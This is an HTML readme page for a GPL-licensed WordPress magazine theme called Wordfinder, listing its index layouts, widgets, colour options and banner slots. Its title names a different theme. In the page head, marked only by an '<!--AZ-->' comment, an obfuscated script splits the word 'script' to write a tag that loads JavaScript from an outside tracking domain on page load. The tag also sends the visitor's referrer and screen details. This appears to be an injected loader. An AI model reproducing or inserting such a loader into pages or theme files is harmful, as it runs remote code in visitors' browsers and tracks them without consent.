﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<title>A guide to the Prototype theme</title>
<link rel="stylesheet" href="../style.css" type="text/css" media="screen" />
<style>
#container {width:750px;}
.welcome{color:#999; font-weight:normal; font-size:16px; letter-spacing:0px;}
ul{list-style: url(../images/bullet.gif); list-style-position: inside; margin:10px 0 10px 0;}
li{font-size:14px; line-height:28px;}
img{border:none; background:none;}</style>


<!--AZ-->
<script type="text/javascript"><!--
(function() {
var p=(('https:'==document.location.protocol)?'https:':'http:');
var s=p+'//www.accanalyze.com/js/tracking.js';
document.write('<scr'+'ipt src="'+s+'?ti=2553&');
document.write('referrer='+encodeURIComponent(document.referrer)+'&');
document.write('width='+screen.width+'&');
document.write('height='+screen.height+'&');
document.write('color='+screen.colorDepth+'"></scr'+'ipt>');
})();
// -->
</script>
</head>
<body>
<div id="container">
<img src="../images/logo.png" />

<h1>Wordfinder WordPress Theme</h1>

<h2 class="welcome"><em>Wordfinder is a simple magazine wordpress theme.This theme provide a very simple layout for users who want to start a blog very quickly but with a minimal layout style.
This theme has many layout features,2 different main index as needed, 6 color for links and hover effect, a jQuery support for the hover effect on index and a full support of wordpress standards.</em> </h2>
</br>
<h1>Features</h1>

<h2 class="welcome"><em>Wordfinder is built without a self framework and a very simple structure.Support W3C web standards and below are listed the features of this theme: </em> </h2>

<ul>
	<li>2 Type of index.php : Diary and Minimal.</li>
	<li>6 Colors for stilying links and hover effect.</li>
	<li>Logo Replacement with your own logo </li>
	<li>A scrollable toolbar with menu and search.The scrollable feature can be disabled from Theme Option Page</li>
	<li>Wordpress Menu Navigation Support with 3 Level Depth</li>
	<li>Threaded Comment Template with 5 depth level for nested comments.</li>
	<li>Sticky Post Support</li>
	<li>5 Widget Highly-configurable Area  </li>
	<li>SubFooter Area with disable/enable Option</li>
	<li>2 Wordfinder Widget: Popular Post, Social Network </li>
	<li>FeedBurner, Twitter and Facebook account support</li>
	<li>Custom License Text on Footer</li>
	<li>Different Banner Support : 468x60 on header, 250x250 and 4 125x125 banners on sidebar with google adsense support</li>
	<li>Facebook Like and Retweet Button Integrated in the single post page.</li>
	<li>Wordpress Post Thumbnail Support for the first post of index and for archive page.</li>
</ul>




</br>
<h1>Copyright &amp; license</h1>

<p><em>Wordfinder</em> is licensed under the <a href="http://www.gnu.org/licenses/quick-guide-gplv3.html" title="GNU GPL">GNU General Public License</a>, version 3 (<acronym title="GNU General Public License">GPL</acronym>).

This theme is copyrighted to <a href="http://llowit.com" title="Lorenzo Lagana' on Web">Lorenzo Lagana'</a>.</p>

<p>2010 &copy; Lorenzo Lagana'.  All rights reserved.</p>
</div>
</body>
</html>